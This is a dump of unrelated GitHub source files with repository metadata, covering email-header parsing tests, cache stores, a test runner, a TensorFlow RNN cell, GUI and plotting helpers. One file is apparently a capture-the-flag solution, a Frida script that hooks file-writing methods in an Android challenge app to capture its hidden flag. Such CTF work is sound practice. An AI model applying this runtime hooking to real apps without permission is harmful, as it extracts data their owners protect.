def test_rfc2231_no_language_or_charset(self):
m = '''\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename="file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm"
Content-Type: text/html; NAME*0=file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEM; NAME*1=P_nsmail.htm
'''
msg = email.message_from_string(m)
param = msg.get_param('NAME')
self.assertFalse(isinstance(param, tuple))
self.assertEqual(
param,
'file____C__DOCUMENTS_20AND_20SETTINGS_FABIEN_LOCAL_20SETTINGS_TEMP_nsmail.htm')
def test_rfc2231_no_language_or_charset_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_filename_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_partly_encoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="''This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20***fun*** is it not.pdf')
def test_rfc2231_partly_nonencoded(self):
m = '''\
Content-Disposition: inline;
\tfilename*0="This%20is%20even%20more%20";
\tfilename*1="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(
msg.get_filename(),
'This%20is%20even%20more%20%2A%2A%2Afun%2A%2A%2A%20is it not.pdf')
def test_rfc2231_no_language_or_charset_in_boundary(self):
m = '''\
Content-Type: multipart/alternative;
\tboundary*0*="''This%20is%20even%20more%20";
\tboundary*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tboundary*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_boundary(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_no_language_or_charset_in_charset(self):
# This is a nonsensical charset value, but tests the code anyway
m = '''\
Content-Type: text/plain;
\tcharset*0*="This%20is%20even%20more%20";
\tcharset*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tcharset*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_content_charset(),
'this is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="bogus'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2="is it not.pdf"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
'This is even more ***fun*** is it not.pdf')
def test_rfc2231_bad_encoding_in_charset(self):
m = """\
Content-Type: text/plain; charset*=bogus''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_charset(self):
m = """\
Content-Type: text/plain; charset*=ascii''utf-8%E2%80%9D
"""
msg = email.message_from_string(m)
# This should return None because non-ascii characters in the charset
# are not allowed.
self.assertEqual(msg.get_content_charset(), None)
def test_rfc2231_bad_character_in_filename(self):
m = '''\
Content-Disposition: inline;
\tfilename*0*="ascii'xx'This%20is%20even%20more%20";
\tfilename*1*="%2A%2A%2Afun%2A%2A%2A%20";
\tfilename*2*="is it not.pdf%E2"
'''
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(),
u'This is even more ***fun*** is it not.pdf\ufffd')
def test_rfc2231_unknown_encoding(self):
m = """\
Content-Transfer-Encoding: 8bit
Content-Disposition: inline; filename*=X-UNKNOWN''myfile.txt
"""
msg = email.message_from_string(m)
self.assertEqual(msg.get_filename(), 'myfile.txt')
def test_rfc2231_single_tick_in_filename_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, None)
eq(language, None)
eq(s, "Frank's Document")
def test_rfc2231_single_tick_in_filename(self):
m = """\
Content-Type: application/x-foo; name*0=\"Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.assertFalse(isinstance(param, tuple))
self.assertEqual(param, "Frank's Document")
def test_rfc2231_tick_attack_extended(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'Frank's\"; name*1*=\" Document\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, "Frank's Document")
def test_rfc2231_tick_attack(self):
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'Frank's\"; name*1=\" Document\"
"""
msg = email.message_from_string(m)
param = msg.get_param('name')
self.assertFalse(isinstance(param, tuple))
self.assertEqual(param, "us-ascii'en-us'Frank's Document")
def test_rfc2231_no_extended_values(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo; name=\"Frank's Document\"
"""
msg = email.message_from_string(m)
eq(msg.get_param('name'), "Frank's Document")
def test_rfc2231_encoded_then_unencoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0*=\"us-ascii'en-us'My\";
\tname*1=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
def test_rfc2231_unencoded_then_encoded_segments(self):
eq = self.assertEqual
m = """\
Content-Type: application/x-foo;
\tname*0=\"us-ascii'en-us'My\";
\tname*1*=\" Document\";
\tname*2*=\" For You\"
"""
msg = email.message_from_string(m)
charset, language, s = msg.get_param('name')
eq(charset, 'us-ascii')
eq(language, 'en-us')
eq(s, 'My Document For You')
def _testclasses():
mod = sys.modules[__name__]
return [getattr(mod, name) for name in dir(mod) if name.startswith('Test')]
def suite():
suite = unittest.TestSuite()
for testclass in _testclasses():
suite.addTest(unittest.makeSuite(testclass))
return suite
def test_main():
for testclass in _testclasses():
run_unittest(testclass)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| {
"content_hash": "0e3de72ba64443643603f762de49cb1a",
"timestamp": "",
"source": "github",
"line_count": 3321,
"max_line_length": 460,
"avg_line_length": 37.429990966576334,
"alnum_prop": 0.5912071115401633,
"repo_name": "wangyou/XX-Net",
"id": "f28b7a4c9bde148089adca0dd14098fec62b9286",
"size": "124420",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "code/default/python27/1.0/lib/email/test/test_email_renamed.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "88"
},
{
"name": "C",
"bytes": "1497159"
},
{
"name": "C++",
"bytes": "252"
},
{
"name": "CSS",
"bytes": "86313"
},
{
"name": "HTML",
"bytes": "141164"
},
{
"name": "JavaScript",
"bytes": "345949"
},
{
"name": "PHP",
"bytes": "10671"
},
{
"name": "Python",
"bytes": "16303044"
},
{
"name": "Shell",
"bytes": "7391"
},
{
"name": "Visual Basic",
"bytes": "1679"
}
],
"symlink_target": ""
} |
'''
Provides several CacheStore backends for Cheetah's caching framework. The
methods provided by these classes have the same semantics as those in the
python-memcached API, except for their return values:
set(key, val, time=0)
set the value unconditionally
add(key, val, time=0)
set only if the server doesn't already have this key
replace(key, val, time=0)
set only if the server already have this key
get(key, val)
returns val or raises a KeyError
delete(key)
deletes or raises a KeyError
'''
import time
class Error(Exception):
pass
class AbstractCacheStore(object):
def set(self, key, val, time=None):
raise NotImplementedError
def add(self, key, val, time=None):
raise NotImplementedError
def replace(self, key, val, time=None):
raise NotImplementedError
def delete(self, key):
raise NotImplementedError
def get(self, key):
raise NotImplementedError
class MemoryCacheStore(AbstractCacheStore):
def __init__(self):
self._data = {}
def set(self, key, val, time=0):
self._data[key] = (val, time)
def add(self, key, val, time=0):
if key in self._data:
raise Error('a value for key %r is already in the cache'%key)
self._data[key] = (val, time)
def replace(self, key, val, time=0):
if key in self._data:
raise Error('a value for key %r is already in the cache'%key)
self._data[key] = (val, time)
def delete(self, key):
del self._data[key]
def get(self, key):
(val, exptime) = self._data[key]
if exptime and time.time() > exptime:
del self._data[key]
raise KeyError(key)
else:
return val
def clear(self):
self._data.clear()
class MemcachedCacheStore(AbstractCacheStore):
servers = ('127.0.0.1:11211')
def __init__(self, servers=None, debug=False):
if servers is None:
servers = self.servers
from memcache import Client as MemcachedClient
self._client = MemcachedClient(servers, debug)
def set(self, key, val, time=0):
self._client.set(key, val, time)
def add(self, key, val, time=0):
res = self._client.add(key, val, time)
if not res:
raise Error('a value for key %r is already in the cache'%key)
self._data[key] = (val, time)
def replace(self, key, val, time=0):
res = self._client.replace(key, val, time)
if not res:
raise Error('a value for key %r is already in the cache'%key)
self._data[key] = (val, time)
def delete(self, key):
res = self._client.delete(key, time=0)
if not res:
raise KeyError(key)
def get(self, key):
val = self._client.get(key)
if val is None:
raise KeyError(key)
else:
return val
def clear(self):
self._client.flush_all()
| {
"content_hash": "d59738179ca7ffae4d71834be6af3c3f",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 74,
"avg_line_length": 28.556603773584907,
"alnum_prop": 0.59200528576148,
"repo_name": "nzavagli/UnrealPy",
"id": "8017018768155db4be714fc5055607ec02929626",
"size": "3027",
"binary": false,
"copies": "16",
"ref": "refs/heads/master",
"path": "UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Cheetah-2.4.4/cheetah/CacheStore.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "APL",
"bytes": "587"
},
{
"name": "ASP",
"bytes": "2753"
},
{
"name": "ActionScript",
"bytes": "5686"
},
{
"name": "Ada",
"bytes": "94225"
},
{
"name": "Agda",
"bytes": "3154"
},
{
"name": "Alloy",
"bytes": "6579"
},
{
"name": "ApacheConf",
"bytes": "12482"
},
{
"name": "AppleScript",
"bytes": "421"
},
{
"name": "Assembly",
"bytes": "1093261"
},
{
"name": "AutoHotkey",
"bytes": "3733"
},
{
"name": "AutoIt",
"bytes": "667"
},
{
"name": "Awk",
"bytes": "63276"
},
{
"name": "Batchfile",
"bytes": "147828"
},
{
"name": "BlitzBasic",
"bytes": "185102"
},
{
"name": "BlitzMax",
"bytes": "2387"
},
{
"name": "Boo",
"bytes": "1111"
},
{
"name": "Bro",
"bytes": "7337"
},
{
"name": "C",
"bytes": "108397183"
},
{
"name": "C#",
"bytes": "156749"
},
{
"name": "C++",
"bytes": "13535833"
},
{
"name": "CLIPS",
"bytes": "6933"
},
{
"name": "CMake",
"bytes": "12441"
},
{
"name": "COBOL",
"bytes": "114812"
},
{
"name": "CSS",
"bytes": "430375"
},
{
"name": "Ceylon",
"bytes": "1387"
},
{
"name": "Chapel",
"bytes": "4366"
},
{
"name": "Cirru",
"bytes": "2574"
},
{
"name": "Clean",
"bytes": "9679"
},
{
"name": "Clojure",
"bytes": "23871"
},
{
"name": "CoffeeScript",
"bytes": "20149"
},
{
"name": "ColdFusion",
"bytes": "9006"
},
{
"name": "Common Lisp",
"bytes": "49017"
},
{
"name": "Coq",
"bytes": "66"
},
{
"name": "Cucumber",
"bytes": "390"
},
{
"name": "Cuda",
"bytes": "776"
},
{
"name": "D",
"bytes": "7556"
},
{
"name": "DIGITAL Command Language",
"bytes": "425938"
},
{
"name": "DTrace",
"bytes": "6706"
},
{
"name": "Dart",
"bytes": "591"
},
{
"name": "Dylan",
"bytes": "6343"
},
{
"name": "Ecl",
"bytes": "2599"
},
{
"name": "Eiffel",
"bytes": "2145"
},
{
"name": "Elixir",
"bytes": "4340"
},
{
"name": "Emacs Lisp",
"bytes": "18303"
},
{
"name": "Erlang",
"bytes": "5746"
},
{
"name": "F#",
"bytes": "19156"
},
{
"name": "FORTRAN",
"bytes": "38458"
},
{
"name": "Factor",
"bytes": "10194"
},
{
"name": "Fancy",
"bytes": "2581"
},
{
"name": "Fantom",
"bytes": "25331"
},
{
"name": "GAP",
"bytes": "29880"
},
{
"name": "GLSL",
"bytes": "450"
},
{
"name": "Gnuplot",
"bytes": "11501"
},
{
"name": "Go",
"bytes": "5444"
},
{
"name": "Golo",
"bytes": "1649"
},
{
"name": "Gosu",
"bytes": "2853"
},
{
"name": "Groff",
"bytes": "3458639"
},
{
"name": "Groovy",
"bytes": "2586"
},
{
"name": "HTML",
"bytes": "92126540"
},
{
"name": "Haskell",
"bytes": "49593"
},
{
"name": "Haxe",
"bytes": "16812"
},
{
"name": "Hy",
"bytes": "7237"
},
{
"name": "IDL",
"bytes": "2098"
},
{
"name": "Idris",
"bytes": "2771"
},
{
"name": "Inform 7",
"bytes": "1944"
},
{
"name": "Inno Setup",
"bytes": "18796"
},
{
"name": "Ioke",
"bytes": "469"
},
{
"name": "Isabelle",
"bytes": "21392"
},
{
"name": "Jasmin",
"bytes": "9428"
},
{
"name": "Java",
"bytes": "4040623"
},
{
"name": "JavaScript",
"bytes": "223927"
},
{
"name": "Julia",
"bytes": "27687"
},
{
"name": "KiCad",
"bytes": "475"
},
{
"name": "Kotlin",
"bytes": "971"
},
{
"name": "LSL",
"bytes": "160"
},
{
"name": "Lasso",
"bytes": "18650"
},
{
"name": "Lean",
"bytes": "6921"
},
{
"name": "Limbo",
"bytes": "9891"
},
{
"name": "Liquid",
"bytes": "862"
},
{
"name": "LiveScript",
"bytes": "972"
},
{
"name": "Logos",
"bytes": "19509"
},
{
"name": "Logtalk",
"bytes": "7260"
},
{
"name": "Lua",
"bytes": "8677"
},
{
"name": "Makefile",
"bytes": "2053844"
},
{
"name": "Mask",
"bytes": "815"
},
{
"name": "Mathematica",
"bytes": "191"
},
{
"name": "Max",
"bytes": "296"
},
{
"name": "Modelica",
"bytes": "6213"
},
{
"name": "Modula-2",
"bytes": "23838"
},
{
"name": "Module Management System",
"bytes": "14798"
},
{
"name": "Monkey",
"bytes": "2587"
},
{
"name": "Moocode",
"bytes": "3343"
},
{
"name": "MoonScript",
"bytes": "14862"
},
{
"name": "Myghty",
"bytes": "3939"
},
{
"name": "NSIS",
"bytes": "7663"
},
{
"name": "Nemerle",
"bytes": "1517"
},
{
"name": "NewLisp",
"bytes": "42726"
},
{
"name": "Nimrod",
"bytes": "37191"
},
{
"name": "Nit",
"bytes": "55581"
},
{
"name": "Nix",
"bytes": "2448"
},
{
"name": "OCaml",
"bytes": "42416"
},
{
"name": "Objective-C",
"bytes": "104883"
},
{
"name": "Objective-J",
"bytes": "15340"
},
{
"name": "Opa",
"bytes": "172"
},
{
"name": "OpenEdge ABL",
"bytes": "49943"
},
{
"name": "PAWN",
"bytes": "6555"
},
{
"name": "PHP",
"bytes": "68611"
},
{
"name": "PLSQL",
"bytes": "45772"
},
{
"name": "Pan",
"bytes": "1241"
},
{
"name": "Pascal",
"bytes": "349743"
},
{
"name": "Perl",
"bytes": "5931502"
},
{
"name": "Perl6",
"bytes": "113623"
},
{
"name": "PigLatin",
"bytes": "6657"
},
{
"name": "Pike",
"bytes": "8479"
},
{
"name": "PostScript",
"bytes": "18216"
},
{
"name": "PowerShell",
"bytes": "14236"
},
{
"name": "Prolog",
"bytes": "43750"
},
{
"name": "Protocol Buffer",
"bytes": "3401"
},
{
"name": "Puppet",
"bytes": "130"
},
{
"name": "Python",
"bytes": "122886156"
},
{
"name": "QML",
"bytes": "3912"
},
{
"name": "R",
"bytes": "49247"
},
{
"name": "Racket",
"bytes": "11341"
},
{
"name": "Rebol",
"bytes": "17708"
},
{
"name": "Red",
"bytes": "10536"
},
{
"name": "Redcode",
"bytes": "830"
},
{
"name": "Ruby",
"bytes": "91403"
},
{
"name": "Rust",
"bytes": "6788"
},
{
"name": "SAS",
"bytes": "15603"
},
{
"name": "SaltStack",
"bytes": "1040"
},
{
"name": "Scala",
"bytes": "730"
},
{
"name": "Scheme",
"bytes": "50346"
},
{
"name": "Scilab",
"bytes": "943"
},
{
"name": "Shell",
"bytes": "2925097"
},
{
"name": "ShellSession",
"bytes": "320"
},
{
"name": "Smali",
"bytes": "832"
},
{
"name": "Smalltalk",
"bytes": "158636"
},
{
"name": "Smarty",
"bytes": "523"
},
{
"name": "SourcePawn",
"bytes": "130"
},
{
"name": "Standard ML",
"bytes": "36869"
},
{
"name": "Swift",
"bytes": "2035"
},
{
"name": "SystemVerilog",
"bytes": "265"
},
{
"name": "Tcl",
"bytes": "6077233"
},
{
"name": "TeX",
"bytes": "487999"
},
{
"name": "Tea",
"bytes": "391"
},
{
"name": "TypeScript",
"bytes": "535"
},
{
"name": "VHDL",
"bytes": "4446"
},
{
"name": "VimL",
"bytes": "32053"
},
{
"name": "Visual Basic",
"bytes": "19441"
},
{
"name": "XQuery",
"bytes": "4289"
},
{
"name": "XS",
"bytes": "178055"
},
{
"name": "XSLT",
"bytes": "1995174"
},
{
"name": "Xtend",
"bytes": "727"
},
{
"name": "Yacc",
"bytes": "25665"
},
{
"name": "Zephir",
"bytes": "485"
},
{
"name": "eC",
"bytes": "31545"
},
{
"name": "mupad",
"bytes": "2442"
},
{
"name": "nesC",
"bytes": "23697"
},
{
"name": "xBase",
"bytes": "3349"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import sys
import idiotest.suite as suite
BOLD = 1
FG_RED = 31
FG_GREEN = 32
FG_YELLOW = 33
FG_BLUE = 34
FG_MAGENTA = 35
FG_CYAN = 36
FG_WHITE = 37
def hilite(string, *attr):
"""Add attributes to a string unless stdout is not a tty."""
if not sys.stdout.isatty():
return string
attrs = ';'.join([str(a) for a in attr])
return '\x1b[%sm%s\x1b[0m' % (attrs, string)
def box(width, string, *attr):
"""Format a string in a "box" (between square brackets)."""
l = len(string)
s = hilite(string, *attr)
n = width - len(string)
m = n // 2
return '[%s%s%s]' % (' ' * (n - m), s, ' ' * m)
def print_reason(reason, indent=0):
if not reason:
return
f = sys.stdout
i = ' ' * indent
for line in reason.splitlines():
f.write(i)
f.write(line)
f.write('\n')
f.write('\n')
def const_true(x):
return True
class ConsoleTest(object):
def __init__(self, filter):
self.module = None
self.npass = 0
self.nskip = 0
self.nfail = 0
self.failures = []
self.partial_line = False
if filter is not None:
self.filter = filter.prefix_match
else:
self.filter = const_true
def clearline(self):
if self.partial_line:
print
self.partial_line = False
def module_begin(self, module):
print module.name
self.mpass = 0
self.mskip = 0
self.mfail = 0
return self.filter(module.name)
def module_end(self, module):
if self.mfail:
self.failures.append((module, self.mfail))
self.npass += self.mpass
self.nskip += self.mskip
self.nfail += self.mfail
del self.mpass
del self.mskip
del self.mfail
print
def module_pass(self, module):
self.module_end(module)
def module_fail(self, module, reason):
self.mfail += 1
self.clearline()
print ' %s' % hilite('MODULE FAILED', FG_RED, BOLD)
print_reason(reason, 4)
self.module_end(module)
def module_skip(self, module, reason):
self.mskip += 1
self.clearline()
print ' %s' % hilite('module skipped', FG_BLUE)
print_reason(reason, 4)
self.module_end(module)
def test_begin(self, test):
print ' %-20s' % (test.name,),
self.partial_line = True
return self.filter(test.fullname)
def test_pass(self, test):
if not test.fail:
print box(6, "ok", FG_GREEN)
self.mpass += 1
else:
print box(6, "PASSED", FG_RED, BOLD), '(expected failure)'
self.mfail += 1
self.partial_line = False
def test_fail(self, test, reason):
if not test.fail:
print box(6, 'FAILED', FG_RED, BOLD)
self.mfail += 1
else:
print box(6, 'failed', FG_GREEN), '(as expected)'
self.mpass += 1
print_reason(reason, 4)
self.partial_line = False
def test_skip(self, test, reason):
print box(6, 'skip', FG_BLUE)
print_reason(reason, 4)
self.mskip += 1
self.partial_line = False
def print_summary(self):
print 'tests passed: %d' % (self.npass,)
if self.nskip:
print 'tests skipped: %d' % (self.nskip,)
if self.nfail:
print 'tests failed: %d' % (self.nfail,)
for module, mfail in self.failures:
print ' %s: %d failures' % (module.name, mfail)
print 'test suite:', hilite('FAILED', FG_RED, BOLD)
else:
print 'test suite:', hilite('passed', FG_GREEN)
def success(self):
return self.nfail == 0
def run_suite(suite, env, filter):
obj = ConsoleTest(filter)
suite.run(obj, env)
obj.print_summary()
if obj.success():
sys.exit(0)
else:
sys.exit(1)
| {
"content_hash": "b98671aa78d866a0812f52ec1443ba97",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 70,
"avg_line_length": 26.78523489932886,
"alnum_prop": 0.5427211225256828,
"repo_name": "depp/idiotest",
"id": "9daff69e995187170e6e0c4702dcc45ae2244177",
"size": "4075",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "idiotest/console.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "391"
},
{
"name": "Python",
"bytes": "33554"
}
],
"symlink_target": ""
} |
from unittest.mock import patch
from unittest.mock import call
from unittest.mock import MagicMock
from mt_vagrant import step
from mt_vagrant import settings
@patch('mt_vagrant.step.commands')
def test_mac_install(mock_commands):
step.mac_install()
mock_commands.run.assert_called_with([
'brew cask install virtualbox',
'brew cask install vagrant',
'brew cask install vagrant-manager'
])
@patch('mt_vagrant.step.commands')
def test_add_box(mock_commands):
step.add_box({})
box_name, box_url = settings.DEFAULT_BOX
mock_commands.run.assert_called_with([
'vagrant box add {} {}'.format(box_name, box_url)])
| {
"content_hash": "b2a54501da3980b27877309e6a94b718",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 59,
"avg_line_length": 21.741935483870968,
"alnum_prop": 0.6899109792284867,
"repo_name": "pdiazv/minty",
"id": "f1f11032e6671122bee745cf37d01bba5c77e393",
"size": "674",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mt-vagrant/tests/test_mt_vagrant_step.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29444"
},
{
"name": "Shell",
"bytes": "744"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from configurable import Configurable
#***************************************************************
class BaseCell(Configurable):
""""""
#=============================================================
def __init__(self, *args, **kwargs):
""""""
input_size = kwargs.pop('input_size', None)
output_size = kwargs.pop('output_size', None)
recur_diag_bilin = kwargs.pop('recur_diag_bilin', False)
self.moving_params = kwargs.pop('moving_params', None)
super(BaseCell, self).__init__(*args, **kwargs)
self._output_size = output_size if output_size is not None else self.recur_size
self._input_size = input_size if input_size is not None else self.output_size
self._recur_diag_bilin = recur_diag_bilin
#=============================================================
def __call__(self, inputs, state, scope=None):
""""""
raise NotImplementedError()
#=============================================================
def zero_state(self, batch_size, dtype):
""""""
zero_state = tf.get_variable('Zero_state',
shape=self.state_size,
dtype=dtype,
initializer=tf.zeros_initializer())
state = tf.reshape(tf.tile(zero_state, tf.stack([batch_size])), tf.stack([batch_size, self.state_size]))
state.set_shape([None, self.state_size])
return state
#=============================================================
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self._output_size
@property
def recur_diag_bilin(self):
return self._recur_diag_bilin
@property
def state_size(self):
raise NotImplementedError()
| {
"content_hash": "5c8bd27f9e948466ef4886af9754d6b8",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 108,
"avg_line_length": 34.035714285714285,
"alnum_prop": 0.5204616998950682,
"repo_name": "strubell/Parser",
"id": "6c551d06404d25bdc76253aaff1aa95e57ee2cfc",
"size": "2534",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/rnn_cells/base_cell.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "96702"
},
{
"name": "Python",
"bytes": "330326"
},
{
"name": "Shell",
"bytes": "130545"
}
],
"symlink_target": ""
} |
"""
Allow to trace called methods and package
"""
import frida
import re
syms = []
def on_message(message, data):
global syms
global index, filename
if message['type'] == 'send':
if "SYM" in message["payload"]:
c = message["payload"].split(":")[1]
print c
syms.append(c)
else:
print("[*] {0}".format(message["payload"]))
else:
print(message)
def overload2params(x):
start = 97
params = []
count_re = re.compile('\((.*)\)')
arguments = count_re.findall(x)
if arguments[0]:
arguments = arguments[0]
arguments = arguments.replace(" ", "")
arguments = arguments.split(",")
for _ in arguments:
params.append(chr(start))
start += 1
return ",".join(params)
else:
return ""
def get_script():
jscode = """
Java.perform(function() {
var flagArray = [];
var randomfile = Java.use('java.io.RandomAccessFile');
var skip = true;
randomfile.seek.implementation = function(pos)
{
if (pos == 0){
skip = false;
}
return randomfile.seek.call(this, pos);
}
randomfile.writeChar.implementation = function(c)
{
if(skip || c == 10)
{
send("PARTIAL:"+flagArray.join(""));
}else{
send("index: "+c);
flagArray.push(String.fromCharCode(c))
send("SYM:"+String.fromCharCode(c));
}
return randomfile.writeChar.call(this, c);
}
});
"""
return jscode
def attach_to_process(proc_name):
done = False
process = None
while not done:
try:
process = frida.get_usb_device().attach(proc_name)
done = True
except Exception:
pass
return process
if __name__ == "__main__":
print "[+] Waiting for app called {0}".format("hackchallenge.ahe17.teamsik.org.romanempire")
process = attach_to_process("hackchallenge.ahe17.teamsik.org.romanempire")
script = get_script()
try:
script = process.create_script(script)
except frida.InvalidArgumentError as e:
message = e.args[0]
line = re.compile('Script\(line (\d+)\)')
line = int(line.findall(message)[0])
script = script.split("\n")
print "[-] Error on line {0}:\n{1}: {2}".format(line, line, script[line])
exit(0)
script.on('message', on_message)
print('[*] Attached on process')
print('[*] Press enter to exit...')
script.load()
try:
raw_input()
except KeyboardInterrupt:
pass
print "FLAG: " + "".join(syms) | {
"content_hash": "3677c07f3ac7255e6afa09ac9459b996",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 96,
"avg_line_length": 24.495412844036696,
"alnum_prop": 0.5445692883895131,
"repo_name": "mseclab/AHE17",
"id": "56a285cca1123e47d25db2a8ef855ea9df69a272",
"size": "2670",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "YouCanHideButYouCannotRun/multithreads.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "10274"
},
{
"name": "Java",
"bytes": "7272"
},
{
"name": "Python",
"bytes": "9958"
},
{
"name": "Shell",
"bytes": "12936"
}
],
"symlink_target": ""
} |
'''
Created on Dec 9, 2013
@author: Chris
'''
import wx
from gooey.gui.lang import i18n
from gooey.gui.option_reader import OptionReader
class BasicConfigPanel(wx.Panel, OptionReader):
def __init__(self, parent, **kwargs):
wx.Panel.__init__(self, parent, **kwargs)
self.header_msg = None
self.cmd_textbox = None
self._init_properties()
self._init_components()
self._do_layout()
def _init_components(self):
self.header_msg = self._bold_static_text(i18n.translate('simple_config'))
self.cmd_textbox = wx.TextCtrl(self, -1, "")
def _init_properties(self):
self.SetBackgroundColour('#F0F0F0')
def _do_layout(self):
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.AddSpacer(50)
sizer.Add(self.header_msg, 0, wx.LEFT, 20)
sizer.AddSpacer(10)
h_sizer = wx.BoxSizer(wx.HORIZONTAL)
h_sizer.Add(self.cmd_textbox, 1, wx.ALL | wx.EXPAND)
sizer.Add(h_sizer, 0, wx.LEFT | wx.RIGHT | wx.BOTTOM | wx.EXPAND, 20)
self.SetSizer(sizer)
def _bold_static_text(self, text_label):
text = wx.StaticText(self, label=text_label)
font_size = text.GetFont().GetPointSize()
bold = wx.Font(font_size, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD)
text.SetFont(bold)
return text
def GetOptions(self):
return self.cmd_textbox.GetValue()
def RegisterController(self, controller):
pass
| {
"content_hash": "cb4c4b1ea77e0e1b562b8ab467bcd1a2",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 93,
"avg_line_length": 27.615384615384617,
"alnum_prop": 0.6525069637883009,
"repo_name": "jonathanlurie/Tubular",
"id": "488afd2837e0703bb4913a73e0bc69704fc3f092",
"size": "1436",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/python/gooey/gui/windows/basic_config_panel.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "224547"
},
{
"name": "Shell",
"bytes": "313"
}
],
"symlink_target": ""
} |
from ..legend import Legend
def size_bins_legend(title=None, description=None, footer=None, prop='size',
variable=None, dynamic=True, ascending=False, format=None):
"""Helper function for quickly creating a size bins legend.
Args:
title (str, optional):
Title of legend.
description (str, optional):
Description in legend.
footer (str, optional):
Footer of legend. This is often used to attribute data sources.
prop (str, optional): Allowed properties are 'size' and 'stroke_width'.
It is 'size' by default.
variable (str, optional):
If the information in the legend depends on a different value than the
information set to the style property, it is possible to set an independent
variable.
dynamic (boolean, optional):
Update and render the legend depending on viewport changes.
Defaults to ``True``.
ascending (boolean, optional):
If set to ``True`` the values are sorted in ascending order.
Defaults to ``False``.
format (str, optional): Format to apply to number values in the widget, based on d3-format
specifier (https://github.com/d3/d3-format#locale_format).
Returns:
cartoframes.viz.legend.Legend
Example:
>>> size_bins_style(
... title='Legend title',
... description='Legend description',
... footer='Legend footer',
... dynamic=False,
... format='.2~s')
"""
return Legend('size-bins', title, description, footer, prop, variable, dynamic, ascending, format)
| {
"content_hash": "828a71d467ada391e68665a52ffbb909",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 102,
"avg_line_length": 40.57142857142857,
"alnum_prop": 0.6044600938967136,
"repo_name": "CartoDB/cartoframes",
